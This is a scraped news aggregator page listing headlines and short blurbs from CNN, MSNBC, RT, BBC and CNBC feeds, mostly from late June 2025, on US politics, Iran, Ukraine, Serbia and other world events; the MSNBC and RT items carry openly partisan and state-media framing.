Article link

Array

Joe Biden, the 46th president of the United States, announced on Sunday, July 21, that he is not seeking reelection.

Article link

Array

Fareed is joined by Jane Gilbert, chief heat officer for Miami-Dade County, Fla., who discusses how she is working to combat the effects of record high temperatures in a county that is considered ground zero for the climate crisis in the United States.

Article link

Array

Fareed speaks with David Frum, staff writer at The Atlantic, about how Sen. JD Vance went from being a fierce critic of Donald Trump to becoming the former president's running mate.

Article link

Array

Colorado Gov. Jared Polis tells CNN's Jake Tapper that Biden needs to show Democrats that he can turn his campaign around and says "he hasn't done that yet."

Article link

MSNBC Top Stories

‘Inner city rats’: Alabama’s Tommy Tuberville adds to his ugly record on race

Right-wing Sen. Tommy Tuberville of Alabama already had an indefensible record on race. Then he started talking about "inner-city rats."

Article link

Date of publish: Mon, 30 Jun 2025 13:30:28 GMT

Why a new nationwide boycott of McDonald’s feels like just deserts

The People’s Union organized a weeklong boycott against McDonald's months after the company rolled back many of its well-known DEI initiatives.

Article link

Date of publish: Sun, 29 Jun 2025 10:00:40 GMT

Suspected gunman found dead after fatal shooting of Idaho firefighters

Two firefighters were shot and killed as they responded to a brush fire near Coeur d’Alene, Idaho, authorities said. One other wounded firefighter was out of surgery and stable at a Coeur d'Alene hospital late Sunday.

Article link

Date of publish: Mon, 30 Jun 2025 10:05:36 GMT

The real reason Republicans are rushing to pass the Trump megabill

Senate Republicans succeeded in moving the bill, which cuts taxes and Medicaid funding, closer to a final vote but were still settling on the bill’s actual text.

Article link

Date of publish: Mon, 30 Jun 2025 10:00:41 GMT

The Trump admin is going after Maryland courts for doing exactly what courts are supposed to do

The Trump administration last week filed a lawsuit against every sitting federal judge in the state of Maryland challenging an order issued by the district’s chief judge concerning the handling of habeas corpus petitions.

Article link

Date of publish: Mon, 30 Jun 2025 10:00:00 GMT

RFK Jr. wants all Americans to use wearable health tech. I have questions.

Robert F. Kennedy Jr. shared his plans as Trump's head of HHS to get all Americans to use wearable health tech in the near future.

Article link

Date of publish: Sun, 29 Jun 2025 10:00:40 GMT

What this congressman’s shockingly racist post says about bigotry in Trump 2.0

Even when compared with his first stint in the White House, Trump’s second administration seems far more permissive of unabashed bigotry.

Article link

Date of publish: Sat, 28 Jun 2025 10:00:40 GMT

Pete Hegseth's press conference shows how the Trump administration views the media's job

Hegseth threw a tantrum and Trump threatened lawsuits — because news outlets reported on a government intelligence report on Iran’s nuclear sites.

Article link

Date of publish: Sun, 29 Jun 2025 10:00:40 GMT

Jeff Bezos' exorbitant display of wealth sends a clear message to the rest of us

The wedding of multibillionaire Jeff Bezos and Lauren Sánchez’s has unfolded in a frenzy of paparazzi photos, outrage and protest, whispers of wealthy wedding guests — and, sadly, an uninspiring aesthetic.

Article link

Date of publish: Fri, 27 Jun 2025 21:57:19 GMT

Perhaps now Trump can see why gutting Voice of America was a dreadful mistake

Kari Lake mostly dismantled Voice of America's Persian Service and weakened a major pillar of soft power in the region before Israel bombed Iran this month.

Article link

Date of publish: Fri, 27 Jun 2025 19:25:44 GMT

Trump might give away access to your 401(k) retirement funds

Why private equity wants access to your 401(k) — with the Trump Administration’s help

Article link

Date of publish: Sat, 28 Jun 2025 10:00:39 GMT

Tuesday's Mini-Report, 6.24.25

Today’s edition of quick hits.* A fragile ceasefire: “Israeli Defense Minister Israel Katz told U.S.

Article link

Date of publish: Tue, 24 Jun 2025 21:30:27 GMT

The real reason Republicans are rushing to pass the Trump megabill

Senate Republicans succeeded in moving the bill, which cuts taxes and Medicaid funding, closer to a final vote but were still settling on the bill’s actual text.

Article link

Date of publish: Mon, 30 Jun 2025 10:00:41 GMT

Birthright citizenship suffered a setback. But the judiciary was dealt a heavier blow.

President Donald Trump won big Friday in the Supreme Court birthright citizenship case, with Amy Coney Barrett's decision limiting nationwide injunctions.

Article link

Date of publish: Fri, 27 Jun 2025 21:35:19 GMT

Supreme Court rules against adult industry in case on porn and the First Amendment

A Texas law requiring age verification to access sexual content online prompted a free speech fight from the adult industry.

Article link

Date of publish: Fri, 27 Jun 2025 15:34:46 GMT

Supreme Court sides with parents on keeping their kids out of LGBTQ instruction

The Supreme Court has ruled in a dispute over whether parents can keep their elementary school kids out of public school instruction they say violates their religious beliefs on gender and sexuality.

Article link

Date of publish: Fri, 27 Jun 2025 14:59:38 GMT

How RFK Jr.'s 'medical freedom' initiatives leave LGBTQ people behind

RFK Jr. imposing his views under the guise of freedom and autonomy hits especially hard as the Trump administration continues to attack LGBTQ rights.

Article link

Date of publish: Fri, 27 Jun 2025 10:00:00 GMT

Trans people keep getting let down by the same community they helped liberate

During Pride Month especially, cisgender queer people must stand up for trans people as the most targeted of the LGBTQ community by the Trump administration.

Article link

Date of publish: Thu, 26 Jun 2025 10:00:40 GMT

Major corporations are showing their true colors this Pride — but we’re still here

With Trump sweeping into office on the back of hundreds of millions of dollars spent on anti-trans ads as he led a crusade against DEI efforts, corporate America faded from the LGBTQ rights conversation.

Article link

Date of publish: Fri, 27 Jun 2025 10:00:00 GMT

Transitioning under Trump is frightening — it is also completely liberating

Trump and MAGA Republicans are obsessed with targeting America’s tiny population of trans people. This personal account of medically transitioning while Trump takes office, during Pride 2025, shines light on the complexities of this moment.

Article link

Date of publish: Tue, 24 Jun 2025 10:00:40 GMT

A message of defiance to my colleagues working to dismantle Obergefell

The fight for marriage equality faces new challenges from Louisiana and 8 other states that seek to undermine a landmark Supreme Court ruling handed down a decade ago.

Article link

Date of publish: Wed, 25 Jun 2025 10:00:40 GMT

Senate Republicans’ megabill is even more brutal than the House’s version, CBO says

In early June, the Congressional Budget Office's assessment of the House Republicans' megabill bill was brutal. In late June, the Senate version looks worse.

Article link

Date of publish: Mon, 30 Jun 2025 12:57:05 GMT

Why the University of Virginia’s president will resign under pressure from Trump admin

The Trump administration demanded the ouster of the University of Virginia’s president, Jim Ryan. Unfortunately, he complied.

Article link

Date of publish: Fri, 27 Jun 2025 18:37:08 GMT

Trump is weaponizing 'leakers' to keep Congress away from any inconvenient truths

Trump is limiting intelligence sharing with Congress after a leak undermined his claims about nuclear strikes on Iran. It's all about maintaining power.

Article link

Date of publish: Thu, 26 Jun 2025 22:37:18 GMT

Trump’s cruel immigration machine is still tearing families apart

A Marine Corps veteran’s wife, taken from her two-year-old and three-month-old children.

Article link

Date of publish: Thu, 26 Jun 2025 21:44:55 GMT

RT - Daily news

ChatGPT triggers psychosis – media

Preview The AI bot’s tendency to affirm users’ beliefs has been found to reinforce harmful delusions, according to a report
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 14:05:33 +0000

Vocal critic of West seeks reelection as Ugandan leader

Preview Yoweri Museveni says he aims to expand Uganda’s economy to $500 billion in five years if reelected
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 14:04:51 +0000

Apple Music partially restores sanctioned Russian artists

Preview The platform has brought back the profiles of the likes of Shaman and Polina Gagarina
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 13:35:44 +0000

Musk ‘a wonderful guy’ – Trump

Preview The US president still said that the tech billionaire’s attacks on him and his “big, beautiful bill” were “not appropriate”
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 12:54:34 +0000

Cash disappearing in China – Le Monde

Preview Mobile payments dominate in the Asian country while use of cash has dwindled to near extinction, the outlet has said
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 12:20:51 +0000

New Delhi draws ‘red lines’ in US trade talks – Indian finance minister

Preview Nirmala Sitharaman remains optimistic about a trade deal between India and the US
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 11:57:05 +0000

Germany seeking ‘cyber dome’ from Israel

Preview German Interior Minister Alexander Dobrindt has praised Israel’s digital prowess
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 11:31:08 +0000

Russian news outlet in Azerbaijan raided amid diplomatic row

Preview Sputnik’s branch in Baku has been targeted by the Interior Ministry
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 11:16:14 +0000

Dozens killed in bus crash in Tanzania (PHOTOS)

Preview A head-on collision between two buses in Tanzania’s Kilimanjaro region has killed at least 38 people
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 10:19:11 +0000

NATO’s 5% spending demand ‘absolutely impossible’ – bloc member

Preview European arms manufacturers wouldn’t be able to absorb such a hike, the Spanish defense minister has said
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 10:06:08 +0000

French gangsters ordering hits on ‘UberKills’ service – Le Monde

Preview Police have linked a recent contract killing in France to an encrypted Telegram-based service, the outlet has said  
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 09:28:59 +0000

Gold miners killed in pit collapse in war-torn Sudan

Preview The Sudanese Mineral Resources Company has warned informal miners against excavating at a site it says poses a “high risk to lives”
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 09:14:21 +0000

India to speed up launch of military satellites – media

Preview A full constellation is expected to be operational by the end of 2029
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 08:07:01 +0000

Conflict between government and church in Armenia stirred by same forces as in Ukraine – ex-diplomat

Preview The conflict between Armenia’s government and church is being fueled by the same groups as in Ukraine, according to Andrey Telizhenko
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 07:52:21 +0000

Russia abandons nuclear deal with new NATO member

Preview Prime Minister Mikhail Mishustin has instructed the foreign ministry to inform Stockholm of Moscow’s decision
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 07:39:11 +0000

EU state’s president calls on other members to talk to Russia

Preview Slovak President Peter Pellegrini has urged the EU to stop fearmongering and resume dialogue with Russia
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 05:33:40 +0000

Moscow concert hall massacre suspects say Ukraine ordered attack – Russian media

Preview The suspects in the 2024 attack on a concert hall near Moscow have reportedly implicated the Ukrainian authorities
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 03:16:57 +0000

US firefighters killed in sniper ambush

Preview A gunman has fatally shot two firefighters responding to a wildfire in Idaho
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 01:49:07 +0000

Russian asset freeze has backfired against the West – Putin aide

Preview The freezing of Russian assets has ultimately hurt the West, a senior aide to President Putin has said
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 00:36:51 +0000

Anti-government protesters erect barricades in Belgrade (VIDEOS)

Preview Protesters blocked several streets in downtown Belgrade on Sunday evening
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 22:52:23 +0000

Paris protest demands end to French military aid for Ukraine (VIDEOS)

Preview The rally, organized by Florian Philippot and his party The Patriots, called for France’s exit from NATO as well as a ‘Frexit’
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 21:13:12 +0000

Russia launches ‘massive’ strike on Ukrainian defense industry – MOD

Preview Kinzhal hypersonic missiles and drones were used in an overnight attack, according to the military
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 19:17:00 +0000

Why the next revolution in this country might start in a cathedral

Preview Armenia’s ancient church finds itself at the heart of a political storm as the government cracks down on dissent in robes.
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 19:03:14 +0000

Baltic Sea’s WW2 chemical legacy demands Russia-NATO cooperation – expert

Preview Germany has been trying to extract sunken munitions on its own, while Russia has been left out of the loop completely
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 17:42:16 +0000

How Christian Zionism distorts scripture to serve empire

Preview Why America’s ‘Blessed Israel’ obsession risks the Church, the world – and the truth
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 16:44:14 +0000

Lavrov compares Ukrainian Nazis with Third Reich

Preview Kiev and the Third Reich both killed people based on their ethnicity, Russian Foreign Minister Sergey Lavrov has said
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 15:20:17 +0000

US lifts Russia sanctions that blocked key NPP construction in EU state

Preview Washington has issued a general license allowing Russia’s Gazprombank to resume transactions related to Hungary’s Paks-2 power plant project
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 15:20:08 +0000

Israel claims it killed Hamas co-founder linked to October 7 attack

Preview The IDF has described Hakham Muhammad Issa Al-Issa as one of the masterminds behind the deadly October 7, 2023 attack
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 15:10:31 +0000

Kremlin weighs in on unrest in Armenia

Preview The former Soviet republic has arrested several clerics amid a stand-off with the opposition
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 13:12:43 +0000

India hits back at Pakistan over terror accusation 

Preview Pakistan has accused India of being behind an attack in North Waziristan that killed 13 troops and three civilians 
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 12:30:04 +0000

UK wasted 20 years searching for ‘Russian mole’ in MI6 – Guardian

Preview British spies hunted a suspected Russian mole for 20 years but dropped the case after finding no proof, according to The Guardian
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 11:18:53 +0000

Russian MPs call for driverless taxis to replace migrants

Preview Many taxi drivers are working illegally, increasing safety risks for passengers, lawmakers have argued
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 10:30:11 +0000

Elon Musk escalates attack on Trump’s mega bill

Preview In a 51-49 vote, the US Senate has decided to begin discussing the legislation
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 09:22:32 +0000

Iran could rebuild nuclear program within months – IAEA chief

Preview “You cannot disinvent” Tehran’s technical and industrial capabilities, Rafael Grossi has said
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 08:22:01 +0000

West will never succeed in attempts to defeat Russia – Lavrov

Preview Western war-hawks will not succeed in inflicting a “strategic defeat” on Russia, Foreign Minister Sergey Lavrov has said
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 07:57:10 +0000

Protesters in Belgrade calling for civil war – Serbian Parliament speaker

Preview Ana Brnabic has claimed that the organizers of an anti-government demonstration want to destroy the country
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 06:00:49 +0000

US reacts to ‘calls for execution’ of IAEA chief

Preview Calls in Iran for the execution of the UN nuclear watchdog’s chief are unacceptable, US Secretary of State Marco Rubio has said
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 04:54:48 +0000

No weapons-grade enrichment in Iran – Foreign Ministry spokesman

Preview The Iranian Foreign Ministry spokesman told RT that the nation’s nuclear program remains peaceful despite recent Israeli and US strikes
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 03:31:44 +0000

UK police probe ‘death to IDF’ chants at Glastonbury music festival (VIDEO)

Preview The UK culture secretary and Israeli Embassy have condemned anti-IDF chants during the Glastonbury Festival as incitement
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 02:20:40 +0000

Writing ‘God’ in lowercase is sinful – Russian priests

Preview Russian Orthodox clerics have condemned the lowercase spelling of ‘God’, calling it disrespectful and rooted in Soviet-era atheism
Read Full Article at RT.com

Article link

Date of publish: Sun, 29 Jun 2025 01:38:47 +0000

Jurgen Klopp labels FIFA’s Club World Cup ‘worst idea ever’

Preview The former Liverpool boss has criticized the tournament’s potential impact on the health of players
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 21:15:30 +0000

Iran bars UN atomic energy chief from its nuclear sites

Preview Tehran has accused the nuclear watchdog of issuing a “biased report” that was used to justify the Israeli and US attacks
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 21:09:14 +0000

Clashes break out at anti-government protests in Serbia (VIDEOS)

Preview Clashes between protesters and police have been reported at a major anti-government demonstration in Belgrade
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 20:59:27 +0000

Mass anti-govt protests hit Serbian capital (VIDEO)

Preview Serbian President Aleksandar Vucic has vowed to “defend the country” and warned protesters against violence
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 19:29:28 +0000

12,000 German companies went bust in six months – economic tracker

Preview Nearly 12,000 German companies went bankrupt in the first half of 2025, according to economic tracking agency Creditreform
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 18:36:05 +0000

US terminating trade talks with Canada – Trump

Preview The American president has labeled Ottawa’s digital services tax a “direct and blatant attack” on the US
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 17:52:55 +0000

Russia’s surprising role in the Israel-Iran conflict that you might not know about

Preview Moscow’s subtle influence in the Middle East standoff reveals how diplomacy works when great powers don’t take sides
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 17:25:00 +0000

Ukraine in NATO would mean WWIII – Orban

Preview The Hungarian prime minister has also warned that the EU’s rush to admit Ukraine would bring conflict to the heart of Europe
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 16:04:02 +0000

Vucic urges protesters to avoid ‘madness’ of violent unrest

Preview Serbian President Aleksandar Vucic has urged demonstrators to refrain from violence in student-led protests
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 16:03:26 +0000

North Korea opens ‘world-class’ tourist resort (VIDEO, PHOTOS)

Preview Hotels on the east coast can accommodate around 20,000 people, according to state-run KCNA news agency
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 15:02:09 +0000

Red Sea ships faking links to Russia and China to dodge attacks – Reuters

Preview Ships in the Red Sea have begun signaling false Russian and Chinese ties to reduce the risk of potential attacks, Reuters has reported
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 14:28:16 +0000

He built America’s helicopter. But he dreamed only of Russia.

Preview From the bombers of the Empire to helicopters for the Pentagon – Igor Sikorsky’s machines were always Russian at heart
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 13:58:46 +0000

Global cocaine production hits all-time high – UN

Preview Around 25 million were using the drug worldwide in 2023, up from 17 million in 2013, a new report says
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 13:09:22 +0000

Africa peace deal brokered by Trump tied to US resource push

Preview Rwanda and the DR Congo have signed a peace deal which US President Donald Trump says gives the US rights to the region’s mineral wealth
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 11:33:56 +0000

Pakistani soldiers killed in suicide attack

Preview Civilians are among the injured after a suicide bomber rammed an explosive-laden vehicle into a military convoy in North Waziristan
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 10:53:59 +0000

Iran slams Trump over ‘disrespect’

Preview Stopping the insults is a precondition for resuming nuclear talks, Foreign Minister Abbas Araghchi has said
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 10:10:47 +0000

Zelensky is ‘politically dead’ – Russia’s top UN diplomat

Preview Ukraine’s Vladimir Zelensky is “politically dead” and clings to power to avoid answering for his crimes, Vassily Nebenzia has said
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 07:53:05 +0000

UK Foreign Office comments on incoming MI6 chief’s Nazi family links

Preview The UK Foreign Office has said Blaise Metreweli’s “complex heritage” makes her a good fit to lead MI6
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 03:57:59 +0000

West waging ‘centuries-old war’ against Moscow – Russia’s top UN diplomat

Preview The Ukraine conflict should be viewed as part of the West’s “centuries-old war” with Russia, Ambassador Vassily Nebenzia has said
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 02:37:33 +0000

Putin respects US once again – Trump

Preview US President Donald Trump has said he was happy to receive praise from Russian President Vladimir Putin
Read Full Article at RT.com

Article link

Date of publish: Sat, 28 Jun 2025 01:12:02 +0000

Ukraine conflict settlement, future of US-Russia relations, NATO’s ‘lies’: Highlights from Putin’s Q&A

Preview Russian President Vladimir Putin has spoken about sanctions, the Ukraine conflict, and relations with the US
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 22:30:25 +0000

Trump suspends possible Iran sanctions relief

Preview US President Donald Trump accused the Islamic Republic’s Supreme Leader of ingratitude for claiming to have won the war with Israel
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 20:42:46 +0000

European NATO states wary of buying US arms – Bloomberg

Preview US allies are reportedly put off by President Trump’s coercive attitude towards them and rapprochement with Russia
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 19:17:14 +0000

Putin speaks of ‘great respect’ for Trump

Preview Russian President Vladimir Putin has praised the efforts of his US counterpart Donald Trump to resolve the Ukraine conflict
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 18:52:18 +0000

Major European museum announces complete restoration (VIDEOS)

Preview Russia’s State Hermitage Museum in St. Petersburg is set to undergo a full renovation, according to the director
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 17:21:10 +0000

The US has just declared economic war on Africa. It will backfire

Preview To realize their full trade potential, African nations must address existing barriers and disjointed customs regulations
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 16:53:15 +0000

US and Israeli strikes on Iran violate international law – Lukashenko

Preview Attacks on nuclear facilities blatantly violate international norms and endanger people all over the globe, Alexander Lukashenko has warned
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 15:52:41 +0000

‘One-sided game’ in relations with West has ended – Putin

Preview The West has repeatedly betrayed Russia both with NATO expansion and resolving the Ukraine conflict, Vladimir Putin has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 15:47:25 +0000

Russia and Iran resume direct flights

Preview Russian and Iranian airlines have resumed flights following a suspension earlier this month
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 15:43:11 +0000

Kremlin responds to prospect of NATO nuclear-capable jets on Russian border

Preview Russia would consider the presence of F-35 jets in Estonia a direct threat, Kremlin spokesman Dmitry Peskov has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 15:20:55 +0000

UK starting to turn away Ukrainians – Guardian

Preview Refugee status is sometimes denied on grounds that people can relocate to safer parts of Ukraine, according to the newspaper
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 15:05:17 +0000

Russia ready for new talks with Ukraine – Putin

Preview Draft memorandums by the sides on settling the conflict should be discussed at the next round of talks, the Russian president has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 14:53:03 +0000

Indian coal imports from Russia reach two year high – media

Preview India is dependent on coal for 70% of its electricity needs
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 14:44:39 +0000

NATO’s spending hike math doesn’t add up – Moscow

Preview A Russian Foreign Ministry official has pointed to an inconsistency between the “Russia threat” timeline and spending commitments
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 14:21:54 +0000

Ukrainian military airfield hit with Kinzhal hypersonic missiles – Russian MOD

Preview Russia’s Defense Ministry says it hit a Ukrainian military airfield using hypersonic Kinzhals, drones and long-range precision weapons
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 13:50:36 +0000

US divided on fate of Iran’s enriched uranium after strikes – NYT

Preview Intelligence reports differ as the IAEA says the fuel could have been moved before the attacks, the outlet says
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 13:33:32 +0000

Sierra Leone to host Russian fishing fleet under new deal

Preview The Russian Federal Agency for Fisheries says Sierra Leone is seeking to attract up to 20 Russian vessels to operate in its waters
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 13:07:23 +0000

Zelensky would lose Ukrainian election – survey

Preview A survey by Ukrainian pollster Socis suggests that Valery Zaluzhny could beat Vladimir Zelensky in a presidential election
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 12:52:35 +0000

Russia and Malaysia to boost nuclear cooperation

Preview Russia’s Rosatom and Malaysia have agreed to strengthen nuclear cooperation following a meeting in Moscow
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 12:23:31 +0000

India and Russia discuss supply of S-400s

Preview New Delhi is also looking to upgrade its Sukhoi Su-30 MKI aircraft and procure critical military hardware from Moscow
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 12:11:50 +0000

Trump Mobile drops ‘Made in USA’ label amid China copycat concerns

Preview Trump Mobile has removed the ‘Made in the USA’ label from its site amid growing speculation over a new phone’s foreign origin
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 12:06:15 +0000

Staff at Europe’s biggest nuclear power plant attacked by Ukrainian drone – officials

Preview A group of workers just 400 meters away from the Zaporozhye NPP reactor units was targeted, according to the facility’s management
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 11:26:01 +0000

Study exposes water danger in South African schools

Preview Nearly half of school water samples tested in South Africa were found to contain harmful bacteria, according to WaterCAN
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 11:24:15 +0000

Forget the Middle East: This region could be next to see a major crisis

Preview Russia must watch the fallout of Israel’s wars – especially in its backyard
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 11:01:13 +0000

Incoming MI6 boss’ grandfather was Ukrainian Nazi ‘Butcher’ – UK media

Preview The Daily Mail has confirmed that the incoming MI6 chief’s grandfather was a Nazi collaborator and a war criminal
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 10:56:45 +0000

From bunker bombs to Nobel dreams: Trump’s war for peace

Preview Choosing a military solution over a negotiated one in dealing with Iran is is a throwback to US unilateralism and regime change policies
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 10:46:34 +0000

US and China finalize deal to resume rare-earth shipments

Preview Beijing has suspended exports of a broad range of critical minerals and magnets in response to Washington’s tariff hikes
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 10:08:51 +0000

EU delays vote on new Russia sanctions – media

Preview The 18th package was reportedly removed from the agenda of the EU leaders’ summit due to resistance from Hungary and Slovakia
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 10:08:19 +0000

Dozens killed in high school stampede in African country (VIDEO)

Preview The Central African Republic says the victims were among more than 5,300 students sitting for their baccalaureate exams
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 09:42:42 +0000

Trump mulling investment in Iran’s nuclear program – CNN

Preview The US president is eyeing several incentives to convince Tehran to agree to walk back from uranium enrichment, the network claims
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 09:40:13 +0000

EU state blocks accession talks with Ukraine

Preview Hungary has blocked EU accession talks with Kiev by vetoing a joint statement on Ukraine at the bloc’s Foreign Affairs Council
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 09:20:28 +0000

Prominent Armenian cleric arrested on coup charges: As it happened

Preview Law enforcement raided the local seat of the national church, which had protested territorial concessions to Azerbaijan
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 08:38:05 +0000

Trump threatens Democrats with prosecution for leaking Iran intel

Preview President Donald Trump has called for the prosecution of Democrats for leaking intelligence on Iran strikes
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 08:02:32 +0000

India’s second astronaut in space enters ISS (VIDEO)

Preview SpaceX’s Axiom Mission 4, carrying Shubhanshu Shukla, has successfully docked at the International Space Station
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 07:40:54 +0000

Israel sought to kill Iran’s Khamenei – defense chief

Preview Israel did not have a realistic opportunity to eliminate Iran’s supreme leader, Defense Minister Israel Katz has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 04:41:49 +0000

Russia will not bend under sanctions – finance minister

Preview Western sanctions cannot stop the Russian economy from growing, Finance Minister Anton Siluanov has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 03:47:36 +0000

France warns of ‘worst-case scenario’ on Iran

Preview French President Emmanuel Macron has urged Iran not to withdraw from the Treaty on the Non-Proliferation of Nuclear Weapons
Read Full Article at RT.com

Article link

Date of publish: Fri, 27 Jun 2025 01:35:45 +0000

EU state calls out ‘double standards’ on Russia and Israel

Preview Spain says the EU should impose penalties on Israel over its military operation in Gaza
Read Full Article at RT.com

Article link

Date of publish: Thu, 26 Jun 2025 23:45:01 +0000

Chinese journalist injured in Ukrainian strike on Russian region

Preview A Chinese war reporter has been injured in a Ukrainian strike, Russian officials have said
Read Full Article at RT.com

Article link

Date of publish: Thu, 26 Jun 2025 22:02:44 +0000

US ramps up arrests of Iranians – Fox

Preview US immigration agents have reportedly increased the arrests of Iranians following open hostilities with Tehran
Read Full Article at RT.com

Article link

Date of publish: Thu, 26 Jun 2025 21:29:01 +0000

News

News feeds below.

BBC News

At least 20 Palestinians killed in Israeli strike on Gaza seafront cafe, witnesses and rescuers say

The outdoor cafe was frequently used by journalists, activists and local residents.

Article link

Date of publish: Mon, 30 Jun 2025 13:56:59 GMT

'Unprecedented' alerts in France as blistering heat grips Europe

Dozens of the country's mainland regions are currently under the second-highest alert as the heatwave continues.

Article link

Date of publish: Mon, 30 Jun 2025 12:51:48 GMT

US must rule out more strikes before new talks, Iranian minister tells BBC

Majid Takht-Ravanchi said the Trump administration has "not made their position clear" on further attacks.

Article link

Date of publish: Mon, 30 Jun 2025 11:39:29 GMT

US Top News and Analysis

Home Depot is buying GMS for about $4.3 billion as retailer chases more home pros

Home Depot is trying to attract more sales from contractors and other home professionals.

Article link

Date of publish: Mon, 30 Jun 2025 14:24:25 GMT

Senate begins voting on dozens of amendment's to Trump's domestic spending bill

Lawmakers worked through the weekend to move President Donald Trump's bill closer to the finish line as Republicans' self-imposed July 4 deadline approaches.

Article link

Date of publish: Mon, 30 Jun 2025 14:03:21 GMT

